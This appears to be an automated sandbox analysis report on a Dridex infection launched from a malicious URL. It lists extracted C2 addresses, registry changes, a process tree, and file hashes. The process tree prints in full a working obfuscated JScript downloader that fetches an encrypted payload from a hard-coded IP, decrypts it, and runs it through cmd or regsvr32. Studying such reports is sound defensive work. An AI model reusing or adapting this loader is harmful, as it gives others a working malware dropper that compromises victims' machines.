Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-03-2021 00:03
Static task
static1
URLScan task
urlscan1
Sample
https://myallexit.xyz/promoexit
General
Malware Config
Extracted
dridex
10111
188.165.17.91:8443
81.0.236.90:6601
Signatures
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\g52w7.exe cryptone C:\Users\Admin\AppData\Local\Temp\g52w7.exe cryptone -
Processes:
resource yara_rule behavioral1/memory/1696-10-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/1696-12-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 23 452 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
g52w7.exepid process 1696 g52w7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
g52w7.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA g52w7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30875511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30875511" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2099567733" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2099412222" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30875511" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "323271138" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "323239146" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A867ED34-8B6A-11EB-BEBD-7E1794D3ADA4} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2110974687" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "323222553" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 4808 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 4808 iexplore.exe 4808 iexplore.exe 3672 IEXPLORE.EXE 3672 IEXPLORE.EXE 3672 IEXPLORE.EXE 3672 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 4808 wrote to memory of 3672 4808 iexplore.exe IEXPLORE.EXE PID 4808 wrote to memory of 3672 4808 iexplore.exe IEXPLORE.EXE PID 4808 wrote to memory of 3672 4808 iexplore.exe IEXPLORE.EXE PID 3672 wrote to memory of 4272 3672 IEXPLORE.EXE cmd.exe PID 3672 wrote to memory of 4272 3672 IEXPLORE.EXE cmd.exe PID 3672 wrote to memory of 4272 3672 IEXPLORE.EXE cmd.exe PID 4272 wrote to memory of 452 4272 cmd.exe wscript.exe PID 4272 wrote to memory of 452 4272 cmd.exe wscript.exe PID 4272 wrote to memory of 452 4272 cmd.exe wscript.exe PID 452 wrote to memory of 1420 452 wscript.exe cmd.exe PID 452 wrote to memory of 1420 452 wscript.exe cmd.exe PID 452 wrote to memory of 1420 452 wscript.exe cmd.exe PID 1420 wrote to memory of 1696 1420 cmd.exe g52w7.exe PID 1420 wrote to memory of 1696 1420 cmd.exe g52w7.exe PID 1420 wrote to memory of 1696 1420 cmd.exe g52w7.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://myallexit.xyz/promoexit1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4808 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.97/?MjI3MjQw&nTRrW&s2ht4=Yn6rSCJ2vfzSj2bCIFxj38V7dSTvSgfBOLq1Ubge-jgeELgYOn8xZC1lE87eqzkWNzVafsJOL-UeOZgkW-5WREbIy3F3xzbJFdM0klhWF6jBUxekdVgsU5w4Qn_jPRaLJqRZ0B0ZhVVnNfJ1ypR7BBCPoNTNwsfO-RDp2q-2T8rd3n5Qd&oa1n4=x3rQcvWfaRuPCYjEM_jdTaRGP0zYHliPxYq&NnBMNjA0Mg==" "2"4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c g52w7.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeg52w7.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
faaba18d915845a4197f76aeaebe341c
SHA157c6fea245d86a0a5625f0cf41f643e12ddd3025
SHA25671d9635a70526bbaf70924d5c168b0bf66659948af799536c83679cc723e39b2
SHA512811e2495051f20fde19ac11bd8cc32a3e6ffb216f7f68e08ca6868a2ff7ed238d12006482247897252662c7f78bddcef0fbfa9bfdad695e5f49c131d6ddeae0e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
ac11cd4c71f0ab7a352ea67ee6cb2696
SHA1656934838466f011f436dbaf3cba4ab61d4eee96
SHA256870563ac3b97652ad666ab3f1435393043b279be7abd664172f8df51314472ed
SHA51234c967e9c8ff408f9eff7fa7d43b5f623c071dd4c162ea48db339c2ece077627826efc1d1aac3109e76d6d7c14d44bcd4e2aa0a2d0bc1492402ea7796c1defc2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\1LTDIZ32.cookieMD5
7a92c3311741e12d2d8486a53747b43d
SHA1040d75cba19dcf5c54664e493c6fae84870a1f17
SHA256b22a3a5a3319facf7b0d3b1cd55336136baba7df05d9b7f8c5883dec8bb10ce3
SHA51250b2b4eb53690993c89cf1bb38693aa25b7b9218fb0cc6b235b4b454d09e16f0c630c791f59729ad3f87359c7c809e11053d25a6e8e1fb0c31d2c7811c0d8457
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\E4RKOR9R.cookieMD5
ba1fec0238750980e2ea3e01171888e7
SHA110060b153c6931ecc75130e509180ea4a088364e
SHA25687e2a23da4c9ee1322f1cee93b8d4aa31ea4294cd6ae374e8acf821daf5c2f89
SHA512ca63dd208d584a0535ea878168ed08d7956d6983a31d3e342ee957ebb0a4a498ee43123a2e9d3df9dc58a2bca20e157e7f9f8814ef4f4f7a8f5b7d7bc6e85cf9
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeMD5
63efd90cdf3b9cebab6d80b7ec371ef9
SHA1b8bb0ca0bd6d78081070bd1b6df64fbea64b2b18
SHA2568cf2f817709f1f490190f4cd6d242320da96a88774dbda75c1c62d45f442a886
SHA5129ab605e5ed05df23e2b6aa6175646f75a5de68bcb4a4dfe075cf6382728b73e30689ece99d27e3bffcb82fa1bc15db5098d7d990d7b58602fb9ed28bdfcfda58
-
C:\Users\Admin\AppData\Local\Temp\g52w7.exeMD5
63efd90cdf3b9cebab6d80b7ec371ef9
SHA1b8bb0ca0bd6d78081070bd1b6df64fbea64b2b18
SHA2568cf2f817709f1f490190f4cd6d242320da96a88774dbda75c1c62d45f442a886
SHA5129ab605e5ed05df23e2b6aa6175646f75a5de68bcb4a4dfe075cf6382728b73e30689ece99d27e3bffcb82fa1bc15db5098d7d990d7b58602fb9ed28bdfcfda58
-
memory/452-4-0x0000000000000000-mapping.dmp
-
memory/1420-6-0x0000000000000000-mapping.dmp
-
memory/1696-10-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1696-12-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1696-11-0x0000000002040000-0x000000000207C000-memory.dmpFilesize
240KB
-
memory/1696-7-0x0000000000000000-mapping.dmp
-
memory/3672-2-0x0000000000000000-mapping.dmp
-
memory/4272-3-0x0000000000000000-mapping.dmp